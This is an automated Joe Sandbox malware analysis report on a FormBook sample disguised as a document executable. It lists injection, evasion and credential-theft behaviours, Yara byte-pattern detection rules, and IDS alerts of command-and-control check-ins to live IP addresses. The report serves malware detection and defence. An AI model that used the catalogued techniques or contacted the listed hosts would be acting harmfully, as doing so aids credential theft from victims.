Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Doc 784-01965670.exe

Overview

General Information

Sample name:Doc 784-01965670.exe
Analysis ID:1539643
MD5:f9d3e00cde42773f49276bfd202813f5
SHA1:79e43e7b0d15c4ed5f8fdd1d1e89edf58d5ec1ac
SHA256:0192d385d59bc9e853e7b58a9e3cf65857b7be49c3ba92185bfd7241a36ccc0d
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Contains functionality to detect sleep reduction / modifications
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Doc 784-01965670.exe (PID: 5452 cmdline: "C:\Users\user\Desktop\Doc 784-01965670.exe" MD5: F9D3E00CDE42773F49276BFD202813F5)
    • svchost.exe (PID: 2140 cmdline: "C:\Users\user\Desktop\Doc 784-01965670.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • jEsBIhfnof.exe (PID: 2520 cmdline: "C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • schtasks.exe (PID: 3528 cmdline: "C:\Windows\SysWOW64\schtasks.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
          • jEsBIhfnof.exe (PID: 1536 cmdline: "C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6468 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.2220515840.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.2220515840.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2ebf3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x16e92:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000004.00000002.4509758397.00000000029D0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.4509758397.00000000029D0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bd50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13fef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000004.00000002.4508251164.0000000000440000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2ddf3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16092:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2ebf3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16e92:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Doc 784-01965670.exe", CommandLine: "C:\Users\user\Desktop\Doc 784-01965670.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Doc 784-01965670.exe", ParentImage: C:\Users\user\Desktop\Doc 784-01965670.exe, ParentProcessId: 5452, ParentProcessName: Doc 784-01965670.exe, ProcessCommandLine: "C:\Users\user\Desktop\Doc 784-01965670.exe", ProcessId: 2140, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Doc 784-01965670.exe", CommandLine: "C:\Users\user\Desktop\Doc 784-01965670.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Doc 784-01965670.exe", ParentImage: C:\Users\user\Desktop\Doc 784-01965670.exe, ParentProcessId: 5452, ParentProcessName: Doc 784-01965670.exe, ProcessCommandLine: "C:\Users\user\Desktop\Doc 784-01965670.exe", ProcessId: 2140, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-22T22:56:30.782310+020028554651A Network Trojan was detected192.168.2.552994188.114.97.380TCP
            2024-10-22T22:56:54.995827+020028554651A Network Trojan was detected192.168.2.55310152.13.151.17980TCP
            2024-10-22T22:57:16.920286+020028554651A Network Trojan was detected192.168.2.553196103.106.67.11280TCP
            2024-10-22T22:57:30.667198+020028554651A Network Trojan was detected192.168.2.553215188.114.96.380TCP
            2024-10-22T22:57:44.059111+020028554651A Network Trojan was detected192.168.2.5532193.33.130.19080TCP
            2024-10-22T22:57:57.606581+020028554651A Network Trojan was detected192.168.2.553223217.70.184.5080TCP
            2024-10-22T22:58:11.229555+020028554651A Network Trojan was detected192.168.2.55322794.23.162.16380TCP
            2024-10-22T22:58:25.173782+020028554651A Network Trojan was detected192.168.2.553231103.224.182.24280TCP
            2024-10-22T22:58:38.635814+020028554651A Network Trojan was detected192.168.2.553235209.74.64.18780TCP
            2024-10-22T22:58:52.300187+020028554651A Network Trojan was detected192.168.2.55323965.21.196.9080TCP
            2024-10-22T22:59:05.960240+020028554651A Network Trojan was detected192.168.2.5532433.33.130.19080TCP
            2024-10-22T22:59:19.353782+020028554651A Network Trojan was detected192.168.2.5532473.33.130.19080TCP
            2024-10-22T22:59:33.674797+020028554651A Network Trojan was detected192.168.2.5532518.210.49.13980TCP
            2024-10-22T22:59:48.035272+020028554651A Network Trojan was detected192.168.2.55325594.23.162.16380TCP
            2024-10-22T23:00:05.311558+020028554651A Network Trojan was detected192.168.2.553256188.114.97.380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-22T22:56:47.092076+020028554641A Network Trojan was detected192.168.2.55306552.13.151.17980TCP
            2024-10-22T22:56:49.901782+020028554641A Network Trojan was detected192.168.2.55308052.13.151.17980TCP
            2024-10-22T22:56:53.020839+020028554641A Network Trojan was detected192.168.2.55309252.13.151.17980TCP
            2024-10-22T22:57:09.236356+020028554641A Network Trojan was detected192.168.2.553160103.106.67.11280TCP
            2024-10-22T22:57:11.792564+020028554641A Network Trojan was detected192.168.2.553171103.106.67.11280TCP
            2024-10-22T22:57:14.327473+020028554641A Network Trojan was detected192.168.2.553184103.106.67.11280TCP
            2024-10-22T22:57:22.860956+020028554641A Network Trojan was detected192.168.2.553212188.114.96.380TCP
            2024-10-22T22:57:25.455548+020028554641A Network Trojan was detected192.168.2.553213188.114.96.380TCP
            2024-10-22T22:57:28.095585+020028554641A Network Trojan was detected192.168.2.553214188.114.96.380TCP
            2024-10-22T22:57:36.418936+020028554641A Network Trojan was detected192.168.2.5532163.33.130.19080TCP
            2024-10-22T22:57:38.963511+020028554641A Network Trojan was detected192.168.2.5532173.33.130.19080TCP
            2024-10-22T22:57:41.471377+020028554641A Network Trojan was detected192.168.2.5532183.33.130.19080TCP
            2024-10-22T22:57:50.026061+020028554641A Network Trojan was detected192.168.2.553220217.70.184.5080TCP
            2024-10-22T22:57:52.573055+020028554641A Network Trojan was detected192.168.2.553221217.70.184.5080TCP
            2024-10-22T22:57:55.121101+020028554641A Network Trojan was detected192.168.2.553222217.70.184.5080TCP
            2024-10-22T22:58:03.728578+020028554641A Network Trojan was detected192.168.2.55322494.23.162.16380TCP
            2024-10-22T22:58:06.241903+020028554641A Network Trojan was detected192.168.2.55322594.23.162.16380TCP
            2024-10-22T22:58:08.699956+020028554641A Network Trojan was detected192.168.2.55322694.23.162.16380TCP
            2024-10-22T22:58:17.396447+020028554641A Network Trojan was detected192.168.2.553228103.224.182.24280TCP
            2024-10-22T22:58:19.957028+020028554641A Network Trojan was detected192.168.2.553229103.224.182.24280TCP
            2024-10-22T22:58:22.627976+020028554641A Network Trojan was detected192.168.2.553230103.224.182.24280TCP
            2024-10-22T22:58:30.955570+020028554641A Network Trojan was detected192.168.2.553232209.74.64.18780TCP
            2024-10-22T22:58:33.520112+020028554641A Network Trojan was detected192.168.2.553233209.74.64.18780TCP
            2024-10-22T22:58:36.071268+020028554641A Network Trojan was detected192.168.2.553234209.74.64.18780TCP
            2024-10-22T22:58:44.668685+020028554641A Network Trojan was detected192.168.2.55323665.21.196.9080TCP
            2024-10-22T22:58:47.257463+020028554641A Network Trojan was detected192.168.2.55323765.21.196.9080TCP
            2024-10-22T22:58:49.776104+020028554641A Network Trojan was detected192.168.2.55323865.21.196.9080TCP
            2024-10-22T22:58:58.205425+020028554641A Network Trojan was detected192.168.2.5532403.33.130.19080TCP
            2024-10-22T22:59:00.766304+020028554641A Network Trojan was detected192.168.2.5532413.33.130.19080TCP
            2024-10-22T22:59:03.372904+020028554641A Network Trojan was detected192.168.2.5532423.33.130.19080TCP
            2024-10-22T22:59:11.703664+020028554641A Network Trojan was detected192.168.2.5532443.33.130.19080TCP
            2024-10-22T22:59:14.238086+020028554641A Network Trojan was detected192.168.2.5532453.33.130.19080TCP
            2024-10-22T22:59:16.757788+020028554641A Network Trojan was detected192.168.2.5532463.33.130.19080TCP
            2024-10-22T22:59:26.225331+020028554641A Network Trojan was detected192.168.2.5532488.210.49.13980TCP
            2024-10-22T22:59:28.648693+020028554641A Network Trojan was detected192.168.2.5532498.210.49.13980TCP
            2024-10-22T22:59:31.229419+020028554641A Network Trojan was detected192.168.2.5532508.210.49.13980TCP
            2024-10-22T22:59:39.969207+020028554641A Network Trojan was detected192.168.2.55325294.23.162.16380TCP
            2024-10-22T22:59:42.814443+020028554641A Network Trojan was detected192.168.2.55325394.23.162.16380TCP
            2024-10-22T22:59:45.245233+020028554641A Network Trojan was detected192.168.2.55325494.23.162.16380TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: Doc 784-01965670.exeReversingLabs: Detection: 52%
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2220515840.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4509758397.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4508251164.0000000000440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4508587001.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4511141181.0000000005600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2220815551.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2221191157.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4509677261.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: Doc 784-01965670.exeJoe Sandbox ML: detected
            Source: Doc 784-01965670.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: schtasks.pdb source: svchost.exe, 00000002.00000003.2188818798.000000000342B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2188967652.000000000345A000.00000004.00000020.00020000.00000000.sdmp, jEsBIhfnof.exe, 00000003.00000002.4508686603.0000000000924000.00000004.00000020.00020000.00000000.sdmp, jEsBIhfnof.exe, 00000003.00000002.4508686603.00000000008E8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: jEsBIhfnof.exe, 00000003.00000002.4509238213.0000000000C2E000.00000002.00000001.01000000.00000004.sdmp, jEsBIhfnof.exe, 00000006.00000000.2290300485.0000000000C2E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: Doc 784-01965670.exe, 00000000.00000003.2052253285.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, Doc 784-01965670.exe, 00000000.00000003.2051685242.0000000004620000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2130236373.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2220841061.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2131854715.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2220841061.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.2223204393.0000000002B5A000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4510116276.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.2224989502.0000000002D01000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4510116276.000000000304E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Doc 784-01965670.exe, 00000000.00000003.2052253285.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, Doc 784-01965670.exe, 00000000.00000003.2051685242.0000000004620000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2130236373.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2220841061.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2131854715.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2220841061.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, schtasks.exe, 00000004.00000003.2223204393.0000000002B5A000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4510116276.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.2224989502.0000000002D01000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4510116276.000000000304E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: schtasks.exe, 00000004.00000002.4510450854.00000000034DC000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4508662469.0000000000763000.00000004.00000020.00020000.00000000.sdmp, jEsBIhfnof.exe, 00000006.00000002.4509603605.00000000031CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2509345091.000000003CE2C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: schtasks.pdbGCTL source: svchost.exe, 00000002.00000003.2188818798.000000000342B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2188967652.000000000345A000.00000004.00000020.00020000.00000000.sdmp, jEsBIhfnof.exe, 00000003.00000002.4508686603.0000000000924000.00000004.00000020.00020000.00000000.sdmp, jEsBIhfnof.exe, 00000003.00000002.4508686603.00000000008E8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: schtasks.exe, 00000004.00000002.4510450854.00000000034DC000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4508662469.0000000000763000.00000004.00000020.00020000.00000000.sdmp, jEsBIhfnof.exe, 00000006.00000002.4509603605.00000000031CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2509345091.000000003CE2C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452126
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,0_2_0045C999
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,0_2_00436ADE
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00434BEE
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0045DD7C FindFirstFileW,FindClose,0_2_0045DD7C
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD29
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,0_2_00436D2D
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442E1F
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00475FE5
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8D
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0045C310 FindFirstFileW,FindNextFileW,FindClose,4_2_0045C310
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4x nop then xor eax, eax4_2_00449B90
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4x nop then mov ebx, 00000004h4_2_02B504E1

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:52994 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53080 -> 52.13.151.179:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53065 -> 52.13.151.179:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53092 -> 52.13.151.179:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53160 -> 103.106.67.112:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53171 -> 103.106.67.112:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53213 -> 188.114.96.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53216 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53241 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53220 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53212 -> 188.114.96.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53221 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53250 -> 8.210.49.139:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53227 -> 94.23.162.163:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53219 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53243 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53254 -> 94.23.162.163:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53215 -> 188.114.96.3:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53247 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53225 -> 94.23.162.163:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53229 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53237 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53245 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53226 -> 94.23.162.163:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53214 -> 188.114.96.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53249 -> 8.210.49.139:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53251 -> 8.210.49.139:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53218 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53235 -> 209.74.64.187:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53234 -> 209.74.64.187:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53246 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53242 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53223 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53253 -> 94.23.162.163:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53217 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53256 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53255 -> 94.23.162.163:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53238 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53228 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53101 -> 52.13.151.179:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53233 -> 209.74.64.187:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53231 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53240 -> 3.33.130.190:80
